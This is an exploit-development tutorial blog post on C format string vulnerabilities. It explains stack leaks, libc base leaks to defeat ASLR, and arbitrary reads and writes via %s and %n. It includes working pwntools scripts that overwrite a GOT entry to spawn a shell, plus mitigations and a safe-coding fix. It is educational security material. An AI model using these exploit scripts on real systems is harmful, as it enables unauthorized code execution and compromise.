Thilan Dissanayaka Exploit Development April 08, 2020

Format String Vulnerabilities — Reading and Writing Memory with printf

In the ROP article, we bypassed DEP by chaining existing code fragments. But we left one problem unsolved: ASLR. Address Space Layout Randomization shuffles code and library addresses on every run, so our hardcoded gadget addresses break.

To defeat ASLR, we need to leak a memory address at runtime — discover where libc or the executable actually loaded — and then calculate our gadget addresses from that.

The most classic way to leak memory? A format string vulnerability. One misused printf() call gives us the ability to read the stack, read arbitrary memory addresses, and even write to arbitrary memory. All from a single bug.

Format string vulnerabilities are one of the most elegant and powerful bug classes in C. Let’s explore them.

The Vulnerability

Consider this C code:

#include <stdio.h>

int main() {
    char input[256];
    fgets(input, sizeof(input), stdin);
    printf(input);  // VULNERABLE — user input as format string
    return 0;
}

The bug is on one line: printf(input). The first argument to printf is the format string — it controls how printf interprets the remaining arguments. When you pass user input directly as the format string, the user controls printf’s behavior.

The correct version:

printf("%s", input);  // SAFE — user input is data, not format

With %s, printf treats input as data to print. Without it, printf treats input as instructions.

This mistake seems trivial, but the consequences are devastating.

How printf Actually Works

To understand the exploit, we need to understand how printf reads its arguments.

printf("Name: %s, Age: %d, Score: %f\n", name, age, score);

printf processes the format string left to right. When it encounters a format specifier (%s, %d, %f), it reads the next argument from the stack (on 32-bit) or from registers then the stack (on 64-bit).

On 32-bit x86, the stack looks like this during the printf call:

Higher addresses
┌─────────────────────────┐
│ score (float)            │  ← 3rd argument
├─────────────────────────┤
│ age (int)                │  ← 2nd argument
├─────────────────────────┤
│ name (char*)             │  ← 1st argument
├─────────────────────────┤
│ format string pointer    │  ← printf's 1st param
├─────────────────────────┤
│ return address           │
└─────────────────────────┘
Lower addresses (ESP)

printf doesn’t know how many arguments were actually passed. It blindly trusts the format string. If the format string says %x %x %x, printf reads three values from the stack — whether or not three arguments were pushed.

This is the core of the vulnerability. If we control the format string, we control how many stack values printf reads, and what it does with them.

Reading the Stack — %x and %p

Let’s compile and exploit our vulnerable program:

$ gcc -m32 -no-pie -fno-stack-protector -o vuln vuln.c
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Now let’s send format specifiers as input:

$ echo "AAAA %x %x %x %x %x %x %x %x" | ./vuln
AAAA f7f9d580 ffffd6e8 8048449 f7f9d000 0 0 41414141 20782520

Look at that output. printf processed our %x specifiers and printed stack values in hex. Those are real values sitting on the stack — saved registers, return addresses, function arguments.

And there, at position 7: 41414141. That’s our AAAA (0x41 is the ASCII code for ‘A’). We found our own input on the stack.

Why? Because input is a local variable — it’s stored on the stack. When printf walks up the stack looking for arguments, it eventually reaches the buffer that contains our format string itself.

This is huge. It means:

We can read any value on the stack by using enough %x specifiers
We can read our own input — and since we control our input, we can place specific values on the stack

Direct Parameter Access

Instead of chaining %x %x %x %x %x %x %x to reach position 7, we can access it directly:

$ echo 'AAAA %7$x' | ./vuln
AAAA 41414141

The %7$x syntax means “print the 7th argument in hex.” This is called direct parameter access — and it makes our exploits much cleaner.

Let’s use %p (which prints pointers with the 0x prefix) to make the output clearer:

$ echo '%1$p %2$p %3$p %4$p %5$p %6$p' | ./vuln
0xf7f9d580 0xffffd6e8 0x8048449 0xf7f9d000 (nil) (nil)

Look at those values:

0xf7f9d580 — Looks like a libc address
0xffffd6e8 — Stack address
0x8048449 — Code address (in the executable)

We’re leaking real memory addresses. With ASLR on, these addresses change every run — but once we leak one, we can calculate the base address of libc and use that to find our ROP gadgets.

Leaking libc Base — Defeating ASLR

This is where format strings become a critical exploitation primitive.

Let’s say position 2 on the stack contains 0xf7e2dad3 — a return address inside libc. We know (from the binary’s debug info or by examining libc) that this address is at offset 0x1aad3 from libc’s base.

libc_base = leaked_address - known_offset
libc_base = 0xf7e2dad3 - 0x1aad3 = 0xf7e10000

Now we know libc’s base address. Every function and gadget in libc is at libc_base + offset:

system()  = libc_base + 0x3ada0 = 0xf7e4ada0
"/bin/sh"  = libc_base + 0x15ba0f = 0xf7f6ba0f

Format string → address leak → ASLR defeated → ROP chain with correct addresses → shell.

In a real exploit using pwntools:

from pwn import *

p = process('./vuln')

# Leak libc address from stack position 2
p.sendline(b'%2$p')
leak = int(p.recvline().strip(), 16)

libc_base = leak - 0x1aad3
log.info(f"libc base: {hex(libc_base)}")

system = libc_base + 0x3ada0
binsh  = libc_base + 0x15ba0f
log.info(f"system(): {hex(system)}")
log.info(f"/bin/sh:  {hex(binsh)}")

Reading Arbitrary Memory — %s

%x and %p print values from the stack as numbers. But %s is different — it treats the stack value as a pointer and prints the string at that address.

If we can place an address on the stack (via our input buffer) and then use %s to dereference it, we can read any readable memory address.

We found that our input starts at stack position 7. So:

# Read memory at address 0x08048000 (the ELF header)
import struct

addr = struct.pack("<I", 0x08048000)
payload = addr + b"%7$s"

# addr lands at position 7 on the stack
# %7$s treats position 7 as a pointer and prints the string there

$ python3 -c "import struct; import sys; sys.stdout.buffer.write(struct.pack('<I', 0x08048000) + b'%7\$s')" | ./vuln | xxd | head
00000000: 7f45 4c46 ...

That’s the ELF magic bytes — \x7fELF. We just read arbitrary memory through printf.

We can use this to:

Read the GOT (Global Offset Table) to leak libc function addresses
Read the stack to find canaries or return addresses
Read any readable memory in the process

Writing Memory — %n (The Dangerous One)

Here’s where format strings go from “info leak” to “full compromise.”

The %n format specifier is unique: instead of printing something, it writes the number of characters printed so far to the address pointed to by the argument.

int count;
printf("hello%n", &count);
// count is now 5 (length of "hello")

If we control the format string and can place an address at a known stack position, we can use %n to write to that address.

How the Write Works

We want to write a value to a specific memory address. Here’s the approach:

Place the target address in our input (it lands on the stack at a known position)
Use %Xc to print exactly X characters (controlling the “bytes printed” counter)
Use %n to write the counter to the target address

Writing a Small Value

# Write the value 0x42 (66) to address 0x0804a020
import struct

target_addr = struct.pack("<I", 0x0804a020)

# Print 66 characters (using padding), then write with %n
# Our address is at stack position 7
payload = target_addr + b"%62c%7$n"
# 4 bytes (address) + 62 chars padding = 66 total → writes 0x42

The %62c prints 62 characters (a padded version of a stack value). Combined with the 4 bytes of the address, that’s 66 characters total. %7$n then writes 66 (0x42) to the address at position 7 — which is 0x0804a020.

Writing a Large Value — Two Writes with %hn

Writing large values (like a full 4-byte address) with a single %n would require printing billions of characters. Instead, we write 2 bytes at a time using %hn (half-word write) or 1 byte at a time using %hhn.

To write 0xdeadbeef to address 0x0804a020:

Write 0xbeef to 0x0804a020 (lower 2 bytes)
Write 0xdead to 0x0804a022 (upper 2 bytes)

import struct

addr_low  = struct.pack("<I", 0x0804a020)  # write lower 2 bytes here
addr_high = struct.pack("<I", 0x0804a022)  # write upper 2 bytes here

# We need to print 0xbeef (48879) chars before first %hn
# Then print enough more to reach 0xdead (57005) before second %hn
# The counter wraps for 2-byte writes, so we calculate modulo 0x10000

low_val  = 0xbeef  # 48879
high_val = 0xdead  # 57005

# Addresses take 8 bytes (4+4), printed so far = 8
pad1 = low_val - 8       # chars to print before first write
pad2 = (high_val - low_val) % 0x10000  # additional chars before second write

payload  = addr_low + addr_high
payload += f"%{pad1}c%7$hn".encode()
payload += f"%{pad2}c%8$hn".encode()

This is admittedly fiddly. In practice, everyone uses pwntools:

from pwn import *

# pwntools handles all the math automatically
fmtstr_payload = fmtstr.fmtstr_payload(7, {0x0804a020: 0xdeadbeef})

Practical Exploit — GOT Overwrite to Shell

Now let’s combine everything into a full exploit. The target: overwrite a function’s GOT entry to redirect execution.

The GOT (Global Offset Table) contains the resolved addresses of library functions. When the program calls printf(), it actually jumps to the address stored in printf’s GOT entry. If we overwrite that entry with the address of system(), the next time the program calls printf(), it calls system() instead.

The Vulnerable Program

#include <stdio.h>
#include <string.h>

int main() {
    char input[256];

    while (1) {
        printf("> ");
        fgets(input, sizeof(input), stdin);
        printf(input);  // VULNERABLE
    }

    return 0;
}

The loop is helpful — it gives us multiple interactions. We can leak addresses first, then write.

Step 1: Leak libc Address

from pwn import *

p = process('./vuln')
elf = ELF('./vuln')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

# Leak puts() GOT entry — it contains puts()'s real address in libc
p.sendline(b"AAAA" + b"%7$s" + p32(elf.got['puts']))
# Actually, we need to be more careful with the layout.
# Let's use direct parameter access to leak a known stack value.

# Leak a libc address from the stack
p.recvuntil(b"> ")
p.sendline(b"%3$p")
leak = int(p.recvline().strip(), 16)

libc.address = leak - libc.symbols['__libc_start_main'] - 247  # offset depends on version
log.info(f"libc base: {hex(libc.address)}")

Step 2: Overwrite GOT Entry

Now overwrite printf’s GOT entry with system():

# printf@GOT → system()
# Next time printf(input) is called, it becomes system(input)
# If we send "/bin/sh", it calls system("/bin/sh")

p.recvuntil(b"> ")
payload = fmtstr.fmtstr_payload(7, {elf.got['printf']: libc.symbols['system']})
p.sendline(payload)

# Now printf is actually system()
# Send /bin/sh
p.recvuntil(b"> ")
p.sendline(b"/bin/sh")

p.interactive()

$ python3 exploit.py
[*] libc base: 0xf7e10000
[+] GOT overwrite successful
$ whoami
thilan
$ id
uid=1000(thilan) gid=1000(thilan)

Shell. No shellcode. No ROP chain. Just printf.

Format Strings on 64-bit

On x86-64, the first 6 arguments go in registers (rdi, rsi, rdx, rcx, r8, r9). Stack arguments start at the 7th. But since printf consumes the first argument (the format string pointer in rdi), the “stack” arguments for format specifiers start at the 6th position.

The other key difference: addresses are 8 bytes and often contain null bytes (0x00007fff...). Since printf stops at null bytes (it’s a string function), we can’t put addresses at the beginning of our payload. Instead, we put them after the format specifiers:

# 64-bit format string layout
# Format specifiers first, then addresses (to avoid null byte truncation)
payload  = b"%Xc%Y$hn"    # format specifiers (no null bytes)
payload += b"\x00" * padding
payload += p64(target_addr)  # null bytes are fine at the end

pwntools handles this automatically:

# pwntools auto-detects 64-bit and adjusts layout
payload = fmtstr.fmtstr_payload(6, {target: value}, write_size='short')

Format String Variants in the Wild

The vulnerability isn’t limited to printf. Any function that takes a format string is potentially vulnerable:

Function	Risk
`printf(user_input)`	Classic — prints to stdout
`fprintf(file, user_input)`	Writes to a file
`sprintf(buf, user_input)`	Writes to a buffer (also buffer overflow risk)
`snprintf(buf, n, user_input)`	Bounded write to buffer
`syslog(priority, user_input)`	Logs — often overlooked
`err()/warn()` (BSD)	Error reporting functions

Any of these with user-controlled format strings is exploitable. syslog is especially dangerous because developers often don’t think of log messages as a security surface.

Mitigations

Compiler Warnings

GCC and Clang warn about format string issues:

$ gcc -Wall -Wformat-security vuln.c
vuln.c:5:5: warning: format not a string literal and no format arguments [-Wformat-security]
     printf(input);
     ^

Always compile with -Wall -Wformat-security. Better yet, use -Werror to turn warnings into errors.

FORTIFY_SOURCE

The _FORTIFY_SOURCE macro (enabled by default in most Linux distributions at level 2) replaces printf with a hardened version that detects and blocks %n in format strings loaded from writable memory:

$ gcc -D_FORTIFY_SOURCE=2 -O2 vuln.c -o vuln
$ echo '%n' | ./vuln
*** %n in writable segment detected ***
Aborted (core dumped)

This blocks %n writes but doesn’t prevent %x/%p/%s leaks. Information leaks still work.

RELRO (Read-Only GOT)

Full RELRO makes the GOT read-only after the dynamic linker resolves all symbols at load time. This prevents GOT overwrite attacks.

$ gcc -Wl,-z,relro,-z,now vuln.c -o vuln

With full RELRO, the GOT is mapped as read-only — our %n write to the GOT will segfault instead of redirecting execution.

The workaround: instead of overwriting the GOT, overwrite other targets — return addresses on the stack, .fini_array entries, or function pointers in application data.

Best Practice: Never Use User Input as a Format String

The real fix is trivial:

// WRONG
printf(input);
fprintf(log, user_message);
syslog(LOG_INFO, user_data);

// RIGHT
printf("%s", input);
fprintf(log, "%s", user_message);
syslog(LOG_INFO, "%s", user_data);

Always use "%s" to print user-controlled strings. There is never a legitimate reason to pass user input as a format string.

Cheat Sheet — Format Specifiers for Exploitation

Specifier	Action	Use
`%x`	Print stack value as hex	Stack leak
`%p`	Print stack value as pointer (with 0x prefix)	Stack leak
`%s`	Dereference pointer, print as string	Arbitrary read
`%n`	Write bytes-printed count (4 bytes)	Arbitrary write
`%hn`	Write bytes-printed count (2 bytes)	Arbitrary write (half-word)
`%hhn`	Write bytes-printed count (1 byte)	Arbitrary write (byte)
`%N$x`	Print Nth argument as hex	Direct parameter access
`%Nc`	Print N characters (padding)	Control write value

Final Thoughts

Format string vulnerabilities are a masterclass in how a seemingly minor API misuse — passing user input where a format string is expected — can cascade into full system compromise. From a single printf(input), we can:

Read the stack — Leak canaries, return addresses, saved registers
Read arbitrary memory — Dereference any readable address
Defeat ASLR — Leak libc/executable addresses to calculate offsets
Write arbitrary memory — Overwrite GOT entries, return addresses, function pointers
Achieve code execution — Redirect control flow to system() or a ROP chain

Combined with the ROP techniques we covered earlier, format strings complete the modern exploitation toolkit:

Format string leak → Defeat ASLR → Build ROP chain → Bypass DEP → Shell

That’s the realistic exploitation chain for modern binaries with all protections enabled. And it often starts with a single misused printf.

Happy reversing!